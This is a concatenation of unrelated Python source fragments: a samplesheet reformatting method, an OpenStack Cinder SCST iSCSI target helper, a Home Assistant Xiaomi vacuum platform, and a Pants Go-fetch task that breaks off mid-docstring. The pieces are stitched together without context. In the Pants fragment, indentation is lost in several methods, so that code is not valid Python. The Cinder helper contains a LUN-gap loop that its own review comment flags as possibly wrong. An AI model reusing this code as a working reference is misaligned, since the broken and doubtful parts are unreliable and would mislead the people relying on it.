      if len(column_names) == 0:
        raise ValueError('No expected columns found on the samplesheet data')
      samplesheet_data = samplesheet_data[column_names] # filter samplesheet data
      if self.file_format == 'samplesheet':
        samplesheet._data = \
          samplesheet_data.\
            to_dict(orient='records') # update samplesheet object with new data
        if self.remove_adapters:
          for adapter_key in self.adapter_keys:
            samplesheet.\
              modify_sample_header(\
                section=self.adapter_section,
                type='remove',
                condition_key=adapter_key) # remove adapters from samplesheet
        samplesheet.print_sampleSheet(outfile=output_file) # print corrected samplesheet
      elif self.file_format == 'csv':
        samplesheet_data.to_csv(output_file,index=False) # dump samplesheet data as csv file
    except Exception as e:
      raise ValueError('Failed to reformat samplesheet file {0}, error {1}'.\
                       format(self.infile,e))
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_concurrency import processutils as putils
from cinder import exception
from cinder import utils
from cinder.i18n import _, _LE
from cinder.openstack.common import log as logging
from cinder.volume.targets import iscsi
from cinder.volume import utils as vutils
LOG = logging.getLogger(__name__)
class SCSTAdm(iscsi.ISCSITarget):
    """iSCSI target helper driving SCST through the ``scstadmin`` CLI.

    All SCST interaction shells out to ``scstadmin`` as root. The layout of
    targets/groups/LUNs depends on whether a single shared target IQN
    (``scst_target_iqn_name``) is configured or a per-volume target is used.
    """

    def __init__(self, *args, **kwargs):
        super(SCSTAdm, self).__init__(*args, **kwargs)
        # Cache the configuration values used throughout this helper.
        self.volumes_dir = self.configuration.safe_get('volumes_dir')
        self.iscsi_target_prefix = self.configuration.safe_get(
            'iscsi_target_prefix')
        self.target_name = self.configuration.safe_get('scst_target_iqn_name')
        self.target_driver = self.configuration.safe_get('scst_target_driver')
        self.chap_username = self.configuration.safe_get('chap_username')
        self.chap_password = self.configuration.safe_get('chap_password')
        # Initiator IQNs are learned from the connector at connect/disconnect.
        self.initiator_iqn = None
        self.remove_initiator_iqn = None

    def scst_execute(self, *args):
        """Run ``scstadmin`` with the given arguments as root."""
        return utils.execute('scstadmin', *args, run_as_root=True)

    def validate_connector(self, connector):
        """Check the connector and remember its initiator IQN.

        :raises VolumeBackendAPIException: if no initiator is supplied.
        """
        # iSCSI drivers require the initiator information
        if 'initiator' not in connector:
            err_msg = _('The volume driver requires the iSCSI initiator '
                        'name in the connector.')
            LOG.error(err_msg)
            raise exception.VolumeBackendAPIException(data=err_msg)
        self.initiator_iqn = connector['initiator']

    def terminate_connection(self, volume, connector, **kwargs):
        # Remember the initiator so remove_iscsi_target can find its group.
        self.remove_initiator_iqn = connector['initiator']

    def _get_target(self, iqn):
        """Return the rel_tgt_id for `iqn`, or None if it is not listed."""
        (out, _err) = self.scst_execute('-list_target')
        if iqn in out:
            return self._target_attribute(iqn)
        return None

    def _target_attribute(self, iqn):
        """Parse the rel_tgt_id value out of the target attribute listing."""
        (out, _err) = self.scst_execute('-list_tgt_attr', iqn,
                                        '-driver', self.target_driver)
        lines = out.split('\n')
        for line in lines:
            if "rel_tgt_id" in line:
                parsed = line.split()
                return parsed[1]

    def _get_group(self):
        """Return the group listing if this initiator's group exists, else None."""
        scst_group = "%s%s" % (self.initiator_iqn, self.target_name)
        (out, _err) = self.scst_execute('-list_group')
        if scst_group in out:
            return out
        return None

    def _get_luns_info(self):
        """Return the sorted, de-duplicated LUN numbers of the initiator group."""
        scst_group = "%s%s" % (self.initiator_iqn, self.target_name)
        (out, _err) = self.scst_execute('-list_group', scst_group,
                                        '-driver', self.target_driver,
                                        '-target', self.target_name)
        # Extract the text between the "Assigned LUNs:" and
        # "Assigned Initiators:" section headers.
        first = "Assigned LUNs:"
        last = "Assigned Initiators:"
        start = out.index(first) + len(first)
        end = out.index(last, start)
        out = out[start:end]
        luns = []
        for line in out.strip().split("\n")[2:]:
            luns.append(int(line.strip().split(" ")[0]))
        luns = sorted(set(luns))
        return luns

    def _get_target_and_lun(self, context, volume):
        """Pick the target id (always 0 here) and the next free LUN number."""
        iscsi_target = 0
        if not self.target_name or not self._get_group():
            lun = 1
            return iscsi_target, lun
        luns = self._get_luns_info()
        if (not luns) or (luns[0] != 1):
            lun = 1
            return iscsi_target, lun
        else:
            # Walk the LUN list for the first gap; the last-element check
            # guarantees a return when the sequence is contiguous.
            # NOTE(review): this indexes `luns` by LUN *value*, which only
            # works while LUN numbers stay dense from 1 — confirm upstream.
            for lun in luns:
                if (luns[-1] == lun) or (luns[lun - 1] + 1 != luns[lun]):
                    return iscsi_target, (lun + 1)

    def create_iscsi_target(self, name, vol_id, tid, lun, path,
                            chap_auth=None):
        """Create/enable the SCST target and export `path` as a LUN on it.

        :returns: the rel_tgt_id of the (possibly pre-existing) target.
        :raises ISCSITargetHelperCommandFailed: on any scstadmin failure.
        """
        scst_group = "%s%s" % (self.initiator_iqn, self.target_name)
        vol_name = path.split("/")[3]
        try:
            (out, _err) = self.scst_execute('-noprompt',
                                            '-set_drv_attr',
                                            self.target_driver,
                                            '-attributes',
                                            'enabled=1')
            LOG.debug('StdOut from set driver attribute: %s', out)
        except putils.ProcessExecutionError as e:
            LOG.error(_LE("Failed to set attribute for enable target driver "
                          "%s"), e)
            raise exception.ISCSITargetHelperCommandFailed(
                error_message="Failed to enable SCST Target driver.")
        if self._get_target(name) is None:
            try:
                (out, _err) = self.scst_execute('-add_target', name,
                                                '-driver', self.target_driver)
                LOG.debug("StdOut from scstadmin create target: %s", out)
            except putils.ProcessExecutionError as e:
                LOG.error(_LE("Failed to create iscsi target for volume "
                              "id:%(vol_id)s: %(e)s"), {'vol_id': name, 'e': e})
                raise exception.ISCSITargetCreateFailed(volume_id=vol_name)
            try:
                (out, _err) = self.scst_execute('-enable_target', name,
                                                '-driver', self.target_driver)
                LOG.debug("StdOut from scstadmin enable target: %s", out)
            except putils.ProcessExecutionError as e:
                LOG.error(_LE("Failed to set 'enable' attribute for "
                              "SCST target %s"), e)
                # FIX: keyword was misspelled 'error_mesage', which dropped
                # the message from the raised exception.
                raise exception.ISCSITargetHelperCommandFailed(
                    error_message="Failed to enable SCST Target.")
            if chap_auth and self.target_name:
                try:
                    chap_string = self._iscsi_authentication('IncomingUser=',
                                                             *chap_auth)
                    (out, _err) = self.scst_execute('-noprompt',
                                                    '-set_tgt_attr', name,
                                                    '-driver',
                                                    self.target_driver,
                                                    '-attributes',
                                                    chap_string)
                    LOG.debug("StdOut from scstadmin set target attribute:"
                              " %s.", out)
                except putils.ProcessExecutionError:
                    msg = _("Failed to set attribute 'Incoming user' for "
                            "SCST target.")
                    LOG.exception(msg)
                    # FIX: 'error_mesage' -> 'error_message'.
                    raise exception.ISCSITargetHelperCommandFailed(
                        error_message=msg)
        if self.target_name:
            if self._get_group() is None:
                try:
                    (out, _err) = self.scst_execute('-add_group', scst_group,
                                                    '-driver',
                                                    self.target_driver,
                                                    '-target', name)
                    LOG.debug("StdOut from scstadmin create group: %s", out)
                except putils.ProcessExecutionError as e:
                    LOG.error(_LE("Failed to create group to SCST target "
                                  "%s"), e)
                    raise exception.ISCSITargetHelperCommandFailed(
                        error_message="Failed to create group to SCST target.")
            try:
                (out, _err) = self.scst_execute('-add_init',
                                                self.initiator_iqn,
                                                '-driver', self.target_driver,
                                                '-target', name,
                                                '-group', scst_group)
                LOG.debug("StdOut from scstadmin add initiator: %s", out)
            except putils.ProcessExecutionError as e:
                LOG.error(_LE("Failed to add initiator to group "
                              " for SCST target %s"), e)
                raise exception.ISCSITargetHelperCommandFailed(
                    error_message="Failed to add Initiator to group for "
                                  "SCST target.")
        tid = self._get_target(name)
        # Device naming differs between per-volume and shared-target modes.
        if self.target_name is None:
            disk_id = "disk%s" % tid
        else:
            disk_id = "%s%s" % (lun, vol_id.split('-')[-1])
        try:
            self.scst_execute('-open_dev', disk_id,
                              '-handler', 'vdisk_fileio',
                              '-attributes', 'filename=%s' % path)
        except putils.ProcessExecutionError as e:
            LOG.error(_LE("Failed to add device to handler %s"), e)
            raise exception.ISCSITargetHelperCommandFailed(
                error_message="Failed to add device to SCST handler.")
        try:
            if self.target_name:
                self.scst_execute('-add_lun', lun,
                                  '-driver', self.target_driver,
                                  '-target', name,
                                  '-device', disk_id,
                                  '-group', scst_group)
            else:
                self.scst_execute('-add_lun', lun,
                                  '-driver', self.target_driver,
                                  '-target', name,
                                  '-device', disk_id)
        except putils.ProcessExecutionError as e:
            LOG.error(_LE("Failed to add lun to SCST target "
                          "id:%(vol_id)s: %(e)s"), {'vol_id': name, 'e': e})
            raise exception.ISCSITargetHelperCommandFailed(
                error_message="Failed to add LUN to SCST Target for "
                              "volume " + vol_name)
        # SCST uses /etc/scst.conf as the default configuration when it
        # starts
        try:
            self.scst_execute('-write_config', '/etc/scst.conf')
        except putils.ProcessExecutionError:
            LOG.error(_LE("Failed to write in /etc/scst.conf."))
            raise exception.ISCSITargetHelperCommandFailed(
                error_message="Failed to write in /etc/scst.conf.")
        return tid

    def _iscsi_location(self, ip, target, iqn, lun=None):
        """Build the provider_location string: 'ip:port,target iqn lun'."""
        return "%s:%s,%s %s %s" % (ip, self.configuration.iscsi_port,
                                   target, iqn, lun)

    def _get_iscsi_target(self, context, vol_id):
        # FIXME(jdg): Need to implement abc method
        pass

    def _get_target_chap_auth(self, context, iscsi_name):
        """Return the (username, password) configured on the target, or None."""
        # FIXME(jdg): Need to implement abc method
        if self._get_target(iscsi_name) is None:
            return None
        (out, _err) = self.scst_execute('-list_tgt_attr', iscsi_name,
                                        '-driver', self.target_driver)
        first = "KEY"
        last = "Dynamic attributes"
        start = out.index(first) + len(first)
        end = out.index(last, start)
        out = out[start:end]
        out = out.split("\n")[2]
        if "IncomingUser" in out:
            out = out.split(" ")
            # FIX: wrap filter() in list() so the result is subscriptable on
            # Python 3, where filter() returns a lazy iterator.
            out = list(filter(lambda a: a != "", out))
            return (out[1], out[2])
        else:
            return None

    def ensure_export(self, context, volume, volume_path):
        """Recreate the export for `volume` (idempotent on restart)."""
        iscsi_target, lun = self._get_target_and_lun(context, volume)
        if self.target_name is None:
            iscsi_name = "%s%s" % (self.configuration.iscsi_target_prefix,
                                   volume['name'])
        else:
            iscsi_name = self.target_name
        if self.chap_username and self.chap_password:
            chap_auth = (self.chap_username, self.chap_password)
        else:
            chap_auth = self._get_target_chap_auth(context, iscsi_name)
        self.create_iscsi_target(iscsi_name, volume['id'], iscsi_target,
                                 lun, volume_path, chap_auth)

    def create_export(self, context, volume, volume_path):
        """Creates an export for a logical volume."""
        iscsi_target, lun = self._get_target_and_lun(context, volume)
        if self.target_name is None:
            iscsi_name = "%s%s" % (self.configuration.iscsi_target_prefix,
                                   volume['name'])
        else:
            iscsi_name = self.target_name
        if self.chap_username and self.chap_password:
            chap_auth = (self.chap_username, self.chap_password)
        else:
            # Reuse existing credentials if present, otherwise generate.
            chap_auth = self._get_target_chap_auth(context, iscsi_name)
            if not chap_auth:
                chap_auth = (vutils.generate_username(),
                             vutils.generate_password())
        tid = self.create_iscsi_target(iscsi_name, volume['id'], iscsi_target,
                                       lun, volume_path, chap_auth)
        data = {}
        data['location'] = self._iscsi_location(
            self.configuration.iscsi_ip_address, tid, iscsi_name, lun)
        LOG.debug('Set provider_location to: %s', data['location'])
        data['auth'] = self._iscsi_authentication(
            'CHAP', *chap_auth)
        return data

    def remove_export(self, context, volume):
        """Tear down the export for `volume`, if one exists."""
        try:
            location = volume['provider_location'].split(' ')
            iqn = location[1]
            iscsi_target = self._get_target(iqn)
            self.show_target(iscsi_target, iqn)
        except Exception:
            # FIX: added the missing space so the concatenated message does
            # not read "...iscsi_target ispresently...".
            LOG.error(_LE("Skipping remove_export. No iscsi_target is "
                          "presently exported for volume: %s"), volume['id'])
            return
        vol = self.db.volume_get(context, volume['id'])
        lun = "".join(vol['provider_location'].split(" ")[-1:])
        self.remove_iscsi_target(iscsi_target, lun,
                                 volume['id'], volume['name'])

    def remove_iscsi_target(self, tid, lun, vol_id, vol_name, **kwargs):
        """Remove the LUN (and, in per-volume mode, the target) for `vol_id`."""
        disk_id = "%s%s" % (lun, vol_id.split('-')[-1])
        vol_uuid_file = vol_name
        if self.target_name is None:
            iqn = '%s%s' % (self.iscsi_target_prefix, vol_uuid_file)
        else:
            iqn = self.target_name
        if self.target_name is None:
            # Per-volume target mode: drop the whole target and its device.
            try:
                self.scst_execute('-noprompt',
                                  '-rem_target', iqn,
                                  '-driver', 'iscsi')
            except putils.ProcessExecutionError as e:
                LOG.error(_LE("Failed to remove iscsi target for volume "
                              "id:%(vol_id)s: %(e)s"), {'vol_id': vol_id, 'e': e})
                raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
            try:
                self.scst_execute('-noprompt',
                                  '-close_dev', "disk%s" % tid,
                                  '-handler', 'vdisk_fileio')
            except putils.ProcessExecutionError as e:
                LOG.error(_LE("Failed to close disk device %s"), e)
                raise exception.ISCSITargetHelperCommandFailed(
                    error_message="Failed to close disk device for "
                                  "SCST handler.")
            if self._get_target(iqn):
                try:
                    self.scst_execute('-noprompt',
                                      '-rem_target', iqn,
                                      '-driver', self.target_driver)
                except putils.ProcessExecutionError as e:
                    LOG.error(_LE("Failed to remove iscsi target for "
                                  "volume id:%(vol_id)s: %(e)s"),
                              {'vol_id': vol_id, 'e': e})
                    raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
        else:
            # Shared-target mode: only remove this volume's LUN and device.
            if not int(lun) in self._get_luns_info():
                raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
            try:
                scst_group = "%s%s" % (self.remove_initiator_iqn,
                                       self.target_name)
                self.scst_execute('-noprompt', '-rem_lun', lun,
                                  '-driver', self.target_driver,
                                  '-target', iqn, '-group',
                                  scst_group)
            except putils.ProcessExecutionError as e:
                LOG.error(_LE("Failed to remove LUN %s"), e)
                raise exception.ISCSITargetHelperCommandFailed(
                    error_message="Failed to remove LUN for SCST Target.")
            try:
                self.scst_execute('-noprompt',
                                  '-close_dev', disk_id,
                                  '-handler', 'vdisk_fileio')
            except putils.ProcessExecutionError as e:
                LOG.error(_LE("Failed to close disk device %s"), e)
                raise exception.ISCSITargetHelperCommandFailed(
                    error_message="Failed to close disk device for "
                                  "SCST handler.")
        self.scst_execute('-write_config', '/etc/scst.conf')

    def show_target(self, tid, iqn):
        """Raise unless the target identified by `iqn` exists."""
        if iqn is None:
            raise exception.InvalidParameterValue(
                err=_('valid iqn needed for show_target'))
        tid = self._get_target(iqn)
        if tid is None:
            raise exception.ISCSITargetHelperCommandFailed(
                error_message="Target not found")

    def initialize_connection(self, volume, connector):
        """Return the iSCSI connection info dict for `volume`."""
        iscsi_properties = self._get_iscsi_properties(volume)
        return {
            'driver_volume_type': 'iscsi',
            'data': iscsi_properties
        }
|
|
"""
Support for the Xiaomi vacuum cleaner robot.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/vacuum.xiaomi_miio/
"""
import asyncio
from functools import partial
import logging
import os
import voluptuous as vol
from homeassistant.components.vacuum import (
ATTR_CLEANED_AREA, DOMAIN, PLATFORM_SCHEMA, SUPPORT_BATTERY,
SUPPORT_CLEAN_SPOT, SUPPORT_FAN_SPEED, SUPPORT_LOCATE, SUPPORT_PAUSE,
SUPPORT_RETURN_HOME, SUPPORT_SEND_COMMAND, SUPPORT_STATUS, SUPPORT_STOP,
SUPPORT_TURN_OFF, SUPPORT_TURN_ON, VACUUM_SERVICE_SCHEMA, VacuumDevice)
from homeassistant.config import load_yaml_config_file
from homeassistant.const import (
ATTR_ENTITY_ID, CONF_HOST, CONF_NAME, CONF_TOKEN, STATE_OFF, STATE_ON)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['python-miio==0.3.1']
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'Xiaomi Vacuum cleaner'
ICON = 'mdi:google-circles-group'
PLATFORM = 'xiaomi_miio'
# Platform configuration: host and a 32-character device API token are
# mandatory; the name defaults to DEFAULT_NAME.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
    vol.Required(CONF_HOST): cv.string,
    vol.Required(CONF_TOKEN): vol.All(str, vol.Length(min=32, max=32)),
    vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}, extra=vol.ALLOW_EXTRA)
# Extra services registered on top of the standard vacuum services.
SERVICE_MOVE_REMOTE_CONTROL = 'xiaomi_remote_control_move'
SERVICE_MOVE_REMOTE_CONTROL_STEP = 'xiaomi_remote_control_move_step'
SERVICE_START_REMOTE_CONTROL = 'xiaomi_remote_control_start'
SERVICE_STOP_REMOTE_CONTROL = 'xiaomi_remote_control_stop'
# Friendly fan-speed names mapped to the device's numeric speed values.
FAN_SPEEDS = {
    'Quiet': 38,
    'Balanced': 60,
    'Turbo': 77,
    'Max': 90}
# State-attribute keys exposed by MiroboVacuum.device_state_attributes.
ATTR_CLEANING_TIME = 'cleaning_time'
ATTR_DO_NOT_DISTURB = 'do_not_disturb'
ATTR_MAIN_BRUSH_LEFT = 'main_brush_left'
ATTR_SIDE_BRUSH_LEFT = 'side_brush_left'
ATTR_FILTER_LEFT = 'filter_left'
ATTR_CLEANING_COUNT = 'cleaning_count'
ATTR_CLEANED_TOTAL_AREA = 'total_cleaned_area'
ATTR_CLEANING_TOTAL_TIME = 'total_cleaning_time'
ATTR_ERROR = 'error'
ATTR_RC_DURATION = 'duration'
ATTR_RC_ROTATION = 'rotation'
ATTR_RC_VELOCITY = 'velocity'
# Bounds below mirror the device's accepted remote-control ranges.
SERVICE_SCHEMA_REMOTE_CONTROL = VACUUM_SERVICE_SCHEMA.extend({
    vol.Optional(ATTR_RC_VELOCITY):
        vol.All(vol.Coerce(float), vol.Clamp(min=-0.29, max=0.29)),
    vol.Optional(ATTR_RC_ROTATION):
        vol.All(vol.Coerce(int), vol.Clamp(min=-179, max=179)),
    vol.Optional(ATTR_RC_DURATION): cv.positive_int,
})
# Dispatch table: service name -> MiroboVacuum coroutine (and its schema).
SERVICE_TO_METHOD = {
    SERVICE_START_REMOTE_CONTROL: {'method': 'async_remote_control_start'},
    SERVICE_STOP_REMOTE_CONTROL: {'method': 'async_remote_control_stop'},
    SERVICE_MOVE_REMOTE_CONTROL: {
        'method': 'async_remote_control_move',
        'schema': SERVICE_SCHEMA_REMOTE_CONTROL},
    SERVICE_MOVE_REMOTE_CONTROL_STEP: {
        'method': 'async_remote_control_move_step',
        'schema': SERVICE_SCHEMA_REMOTE_CONTROL},
}
SUPPORT_XIAOMI = SUPPORT_TURN_ON | SUPPORT_TURN_OFF | SUPPORT_PAUSE | \
                 SUPPORT_STOP | SUPPORT_RETURN_HOME | SUPPORT_FAN_SPEED | \
                 SUPPORT_SEND_COMMAND | SUPPORT_LOCATE | \
                 SUPPORT_STATUS | SUPPORT_BATTERY | SUPPORT_CLEAN_SPOT
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
    """Set up the Xiaomi vacuum cleaner robot platform."""
    from mirobo import Vacuum
    if PLATFORM not in hass.data:
        hass.data[PLATFORM] = {}
    host = config.get(CONF_HOST)
    token = config.get(CONF_TOKEN)
    # Create handler
    _LOGGER.info("Initializing with host %s (token %s...)", host, token[:5])
    device = MiroboVacuum(config.get(CONF_NAME), Vacuum(host, token))
    hass.data[PLATFORM][host] = device
    async_add_devices([device], update_before_add=True)

    @asyncio.coroutine
    def async_service_handler(service):
        """Map services to methods on MiroboVacuum."""
        method = SERVICE_TO_METHOD.get(service.service)
        params = {key: value for key, value in service.data.items()
                  if key != ATTR_ENTITY_ID}
        entity_ids = service.data.get(ATTR_ENTITY_ID)
        if entity_ids:
            targets = [vac for vac in hass.data[PLATFORM].values()
                       if vac.entity_id in entity_ids]
        else:
            targets = hass.data[PLATFORM].values()
        # Invoke the mapped coroutine on every targeted vacuum, then
        # refresh their states.
        update_tasks = []
        for target in targets:
            yield from getattr(target, method['method'])(**params)
        for target in targets:
            update_tasks.append(target.async_update_ha_state(True))
        if update_tasks:
            yield from asyncio.wait(update_tasks, loop=hass.loop)

    descriptions = yield from hass.async_add_job(
        load_yaml_config_file, os.path.join(
            os.path.dirname(__file__), 'services.yaml'))
    for service_name, service_info in SERVICE_TO_METHOD.items():
        schema = service_info.get('schema', VACUUM_SERVICE_SCHEMA)
        hass.services.async_register(
            DOMAIN, service_name, async_service_handler,
            description=descriptions.get(service_name), schema=schema)
class MiroboVacuum(VacuumDevice):
    """Representation of a Xiaomi Vacuum cleaner robot."""
    def __init__(self, name, vacuum):
        """Initialize the Xiaomi vacuum cleaner robot handler.

        :param name: Friendly entity name.
        :param vacuum: mirobo.Vacuum client used for all device I/O.
        """
        self._name = name
        self._icon = ICON
        self._vacuum = vacuum
        # State caches; all remain None/False until the first successful
        # update() poll.
        self.vacuum_state = None
        self._is_on = False
        self._available = False
        self.consumable_state = None
        self.clean_history = None
    @property
    def name(self):
        """Return the name of the device."""
        return self._name
    @property
    def icon(self):
        """Return the icon to use for device."""
        return self._icon
    @property
    def status(self):
        """Return the status of the vacuum cleaner."""
        if self.vacuum_state is not None:
            return self.vacuum_state.state
    @property
    def battery_level(self):
        """Return the battery level of the vacuum cleaner."""
        if self.vacuum_state is not None:
            return self.vacuum_state.battery
    @property
    def fan_speed(self):
        """Return the fan speed of the vacuum cleaner."""
        if self.vacuum_state is not None:
            speed = self.vacuum_state.fanspeed
            # Map the numeric device speed back to its friendly name when
            # possible; otherwise expose the raw number.
            if speed in FAN_SPEEDS.values():
                return [key for key, value in FAN_SPEEDS.items()
                        if value == speed][0]
            return speed
    @property
    def fan_speed_list(self):
        """Get the list of available fan speed steps of the vacuum cleaner."""
        return list(sorted(FAN_SPEEDS.keys(), key=lambda s: FAN_SPEEDS[s]))
    @property
    def device_state_attributes(self):
        """Return the specific state attributes of this vacuum cleaner."""
        # NOTE(review): assumes consumable_state and clean_history were set
        # together with vacuum_state by update() — confirm no partial update.
        attrs = {}
        if self.vacuum_state is not None:
            attrs.update({
                ATTR_DO_NOT_DISTURB:
                    STATE_ON if self.vacuum_state.dnd else STATE_OFF,
                # Not working --> 'Cleaning mode':
                #    STATE_ON if self.vacuum_state.in_cleaning else STATE_OFF,
                ATTR_CLEANING_TIME: int(
                    self.vacuum_state.clean_time.total_seconds()
                    / 60),
                ATTR_CLEANED_AREA: int(self.vacuum_state.clean_area),
                ATTR_CLEANING_COUNT: int(self.clean_history.count),
                ATTR_CLEANED_TOTAL_AREA: int(self.clean_history.total_area),
                ATTR_CLEANING_TOTAL_TIME: int(
                    self.clean_history.total_duration.total_seconds()
                    / 60),
                ATTR_MAIN_BRUSH_LEFT: int(
                    self.consumable_state.main_brush_left.total_seconds()
                    / 3600),
                ATTR_SIDE_BRUSH_LEFT: int(
                    self.consumable_state.side_brush_left.total_seconds()
                    / 3600),
                ATTR_FILTER_LEFT: int(
                    self.consumable_state.filter_left.total_seconds()
                    / 3600)})
            if self.vacuum_state.got_error:
                attrs[ATTR_ERROR] = self.vacuum_state.error
        return attrs
    @property
    def is_on(self) -> bool:
        """Return True if entity is on."""
        return self._is_on
    @property
    def available(self) -> bool:
        """Return True if entity is available."""
        return self._available
    @property
    def supported_features(self):
        """Flag vacuum cleaner robot features that are supported."""
        return SUPPORT_XIAOMI
    @asyncio.coroutine
    def _try_command(self, mask_error, func, *args, **kwargs):
        """Call a vacuum command handling error messages.

        Runs the blocking `func` in the executor; returns True on success,
        logs `mask_error` and returns False on device errors.
        """
        from mirobo import DeviceException, VacuumException
        try:
            yield from self.hass.async_add_job(partial(func, *args, **kwargs))
            return True
        except (DeviceException, VacuumException) as exc:
            _LOGGER.error(mask_error, exc)
            return False
    @asyncio.coroutine
    def async_turn_on(self, **kwargs):
        """Turn the vacuum on."""
        is_on = yield from self._try_command(
            "Unable to start the vacuum: %s", self._vacuum.start)
        self._is_on = is_on
    @asyncio.coroutine
    def async_turn_off(self, **kwargs):
        """Turn the vacuum off and return to home."""
        yield from self.async_stop()
        yield from self.async_return_to_base()
    @asyncio.coroutine
    def async_stop(self, **kwargs):
        """Stop the vacuum cleaner."""
        stopped = yield from self._try_command(
            "Unable to stop: %s", self._vacuum.stop)
        if stopped:
            self._is_on = False
    @asyncio.coroutine
    def async_set_fan_speed(self, fan_speed, **kwargs):
        """Set fan speed.

        Accepts either a friendly name from FAN_SPEEDS or a raw integer.
        """
        if fan_speed.capitalize() in FAN_SPEEDS:
            fan_speed = FAN_SPEEDS[fan_speed.capitalize()]
        else:
            try:
                fan_speed = int(fan_speed)
            except ValueError as exc:
                _LOGGER.error("Fan speed step not recognized (%s). "
                              "Valid speeds are: %s", exc,
                              self.fan_speed_list)
                return
        yield from self._try_command(
            "Unable to set fan speed: %s",
            self._vacuum.set_fan_speed, fan_speed)
    @asyncio.coroutine
    def async_start_pause(self, **kwargs):
        """Start, pause or resume the cleaning task."""
        # Pause when already cleaning; otherwise (re)start.
        if self.vacuum_state and self.is_on:
            yield from self._try_command(
                "Unable to set start/pause: %s", self._vacuum.pause)
        else:
            yield from self.async_turn_on()
    @asyncio.coroutine
    def async_return_to_base(self, **kwargs):
        """Set the vacuum cleaner to return to the dock."""
        return_home = yield from self._try_command(
            "Unable to return home: %s", self._vacuum.home)
        if return_home:
            self._is_on = False
    @asyncio.coroutine
    def async_clean_spot(self, **kwargs):
        """Perform a spot clean-up."""
        yield from self._try_command(
            "Unable to start the vacuum for a spot clean-up: %s",
            self._vacuum.spot)
    @asyncio.coroutine
    def async_locate(self, **kwargs):
        """Locate the vacuum cleaner."""
        yield from self._try_command(
            "Unable to locate the botvac: %s", self._vacuum.find)
    @asyncio.coroutine
    def async_send_command(self, command, params=None, **kwargs):
        """Send raw command."""
        yield from self._try_command(
            "Unable to send command to the vacuum: %s",
            self._vacuum.raw_command, command, params)
    @asyncio.coroutine
    def async_remote_control_start(self):
        """Start remote control mode."""
        yield from self._try_command(
            "Unable to start remote control the vacuum: %s",
            self._vacuum.manual_start)
    @asyncio.coroutine
    def async_remote_control_stop(self):
        """Stop remote control mode."""
        yield from self._try_command(
            "Unable to stop remote control the vacuum: %s",
            self._vacuum.manual_stop)
    @asyncio.coroutine
    def async_remote_control_move(self,
                                  rotation: int=0,
                                  velocity: float=0.3,
                                  duration: int=1500):
        """Move vacuum with remote control mode."""
        yield from self._try_command(
            "Unable to move with remote control the vacuum: %s",
            self._vacuum.manual_control,
            velocity=velocity, rotation=rotation, duration=duration)
    @asyncio.coroutine
    def async_remote_control_move_step(self,
                                       rotation: int=0,
                                       velocity: float=0.2,
                                       duration: int=1500):
        """Move vacuum one step with remote control mode."""
        yield from self._try_command(
            "Unable to remote control the vacuum: %s",
            self._vacuum.manual_control_once,
            velocity=velocity, rotation=rotation, duration=duration)
    def update(self):
        """Fetch state from the device."""
        from mirobo import DeviceException
        try:
            # Fetch status first; consumables and history are only stored
            # after a successful status read.
            state = self._vacuum.status()
            self.vacuum_state = state
            self.consumable_state = self._vacuum.consumable_status()
            self.clean_history = self._vacuum.clean_history()
            self._is_on = state.is_on
            self._available = True
        except OSError as exc:
            _LOGGER.error("Got OSError while fetching the state: %s", exc)
        except DeviceException as exc:
            _LOGGER.warning("Got exception while fetching the state: %s", exc)
|
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import json
import os
import shutil
from collections import defaultdict
from pants.base.address import Address
from pants.base.address_lookup_error import AddressLookupError
from pants.base.exceptions import TaskError
from pants.util.contextutil import temporary_dir
from pants.util.dirutil import safe_mkdir, safe_open
from pants.util.memo import memoized_property
from pants.contrib.go.subsystems.fetchers import Fetchers
from pants.contrib.go.targets.go_remote_library import GoRemoteLibrary
from pants.contrib.go.tasks.go_task import GoTask
class GoFetch(GoTask):
"""Fetches third-party Go libraries."""
  @classmethod
  def global_subsystems(cls):
    # Register the Fetchers subsystem so fetcher selection is configurable.
    return super(GoFetch, cls).global_subsystems() + (Fetchers,)
  @classmethod
  def product_types(cls):
    # This task produces a mapping from remote library to its fetched src dir.
    return ['go_remote_lib_src']
  @property
  def cache_target_dirs(self):
    """Opt in to per-target results dirs so fetched sources can be cached."""
    # TODO(John Sirois): See TODO in _transitive_download_remote_libs, re-consider how artifact
    # caching works for fetches.
    return True
def execute(self):
self.context.products.safe_create_data('go_remote_lib_src', lambda: defaultdict(str))
go_remote_libs = self.context.targets(self.is_remote_lib)
if not go_remote_libs:
return
undeclared_deps = self._transitive_download_remote_libs(set(go_remote_libs))
if undeclared_deps:
self._log_undeclared_deps(undeclared_deps)
raise TaskError('Failed to resolve transitive Go remote dependencies.')
def _log_undeclared_deps(self, undeclared_deps):
for dependee, deps in undeclared_deps.items():
self.context.log.error('{address} has remote dependencies which require local declaration:'
.format(address=dependee.address.reference()))
for dep_import_path, address in deps:
self.context.log.error('\t--> {import_path} (expected go_remote_library declaration '
'at {address})'.format(import_path=dep_import_path,
address=address.reference()))
  def _get_fetcher(self, import_path):
    """Return the globally-configured fetcher responsible for `import_path`."""
    return Fetchers.global_instance().get_fetcher(import_path)
  def _transitive_download_remote_libs(self, go_remote_libs, all_known_addresses=None):
    """Recursively attempt to resolve / download all remote transitive deps of go_remote_libs.

    Returns a dict<GoRemoteLibrary, set<tuple<str, Address>>>, which maps a go remote library to a
    set of unresolved remote dependencies, each dependency expressed as a tuple containing the
    import path of the dependency and the expected target address. If all transitive
    dependencies were successfully resolved, returns an empty dict.

    Downloads as many invalidated transitive dependencies as possible, and returns as many
